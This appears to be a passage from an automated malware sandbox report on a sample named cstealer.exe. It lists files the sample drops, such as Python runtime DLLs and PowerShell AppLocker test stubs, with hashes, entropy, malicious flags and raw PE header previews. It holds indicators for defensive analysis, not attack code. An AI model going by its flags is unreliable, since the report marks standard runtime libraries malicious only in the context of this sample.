                                                                                                                                                          SHA1:38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
                                                                                                                                                          SHA-256:2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
                                                                                                                                                          SHA-512:FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .B...T......<.....................................................`.........................................@A...N..@U..........s........M......`)......h...0...8...............................@............@..@............................text....@.......B.................. ..`.rdata..J/...`...0...F..............@..@.data...AM.......D...v..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............j..............@..@.rsrc...s............l..............@..@.reloc..l............t..............@..B................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\python311.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5758328
                                                                                                                                                          Entropy (8bit):6.089726305084683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:JdHwQkq3AAtsPv3XXTVEspHBMp4SsPxQpe2bx:JdHwQkq3AMsPvHXSpAxQpe2V
                                                                                                                                                          MD5:9A24C8C35E4AC4B1597124C1DCBEBE0F
                                                                                                                                                          SHA1:F59782A4923A30118B97E01A7F8DB69B92D8382A
                                                                                                                                                          SHA-256:A0CF640E756875C25C12B4A38BA5F2772E8E512036E2AC59EB8567BF05FFBFB7
                                                                                                                                                          SHA-512:9D9336BF1F0D3BC9CE4A636A5F4E52C5F9487F51F00614FC4A34854A315CE7EA8BE328153812DBD67C45C75001818FA63317EBA15A6C9A024FA9F2CAB163165B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!.T%..,7......K........................................\......~X...`.........................................P.@......NA......`[.......V../....W.x)...p[..B....).T...........................P.).@............p%..............................text...BS%......T%................. ..`.rdata..0....p%......X%.............@..@.data.........A..N...\A.............@....pdata.../....V..0....Q.............@..@PyRuntim......X.......S.............@....rsrc........`[......fV.............@..@.reloc...B...p[..D...pV.............@..B........................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\select.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29056
                                                                                                                                                          Entropy (8bit):6.49468173344972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5oR1ecReJKwHqUuI7A70RUZ9ID7GvIYiSy1pCQlIJNPxh8E9VF0NyUT2:ezeUeJlHqybG9ID7GQYiSyvCPxWEC
                                                                                                                                                          MD5:97EE623F1217A7B4B7DE5769B7B665D6
                                                                                                                                                          SHA1:95B918F3F4C057FB9C878C8CC5E502C0BD9E54C0
                                                                                                                                                          SHA-256:0046EB32F873CDE62CF29AF02687B1DD43154E9FD10E0AA3D8353D3DEBB38790
                                                                                                                                                          SHA-512:20EDC7EAE5C0709AF5C792F04A8A633D416DA5A38FC69BD0409AFE40B7FB1AFA526DE6FE25D8543ECE9EA44FD6BAA04A9D316AC71212AE9638BDEF768E661E0F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.....2............................................................`..........................................@..L...,A..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\sqlite3.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1481088
                                                                                                                                                          Entropy (8bit):6.569811736013214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
                                                                                                                                                          MD5:AC633A9EB00F3B165DA1181A88BB2BDA
                                                                                                                                                          SHA1:D8C058A4F873FAA6D983E9A5A73A218426EA2E16
                                                                                                                                                          SHA-256:8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
                                                                                                                                                          SHA-512:4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.................................................................`..........................................1..L"..LS..................\....p...)..........`...T........................... ...@...............(............................text............................... ..`.rdata..............................@..@.data....G...p...>...H..............@....pdata..\...........................@..@.rsrc................X..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\unicodedata.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1138040
                                                                                                                                                          Entropy (8bit):5.434701276929729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
                                                                                                                                                          MD5:BC58EB17A9C2E48E97A12174818D969D
                                                                                                                                                          SHA1:11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
                                                                                                                                                          SHA-256:ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
                                                                                                                                                          SHA-512:4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tbtprno.dpu.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_204lollm.mwj.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2r2mi4ug.py0.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5v5oc4yu.avp.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a04izblo.n0e.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awlhljpl.vy3.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bia1u3lt.paz.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gg5rwjjw.lri.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkhdf3t5.plr.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krc3vfgh.w1j.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lh34u3du.b2d.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nj334bye.21s.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p52la42b.nxm.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdthoala.psy.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1wn4va5.x12.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjrx1uxp.tev.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3qaezre.4h5.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugj2f1jm.pvf.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgdd5lsn.csp.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

